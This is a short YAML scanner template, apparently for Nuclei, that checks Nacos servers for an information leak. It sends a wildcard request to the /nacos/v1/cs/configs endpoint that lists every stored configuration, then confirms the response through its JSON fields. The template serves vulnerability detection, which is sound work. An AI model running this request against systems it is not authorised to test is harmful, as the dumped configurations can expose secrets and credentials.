id: nacos-configs-info-leak
info:
  name: Nacos Configs Information Leak
  author: ProjectDiscoveryAI
  severity: medium
  tags: info-leak
http:
  - raw:
      - |
        GET /nacos/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "Nacos"

  - raw:
      - |
        GET /nacos/v1/cs/configs?dataId=*&group=*&appName=&config_tags=&pageNo=1&pageSize=1000&tenant=*&search=blur HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "\"totalCount\":"
      - type: regex
        part: body
        regex:
          - "\"content\":.*?,"
          - "\"tenant\":\".*?,"
      - type: word
        part: header
        words:
          - "application/json"
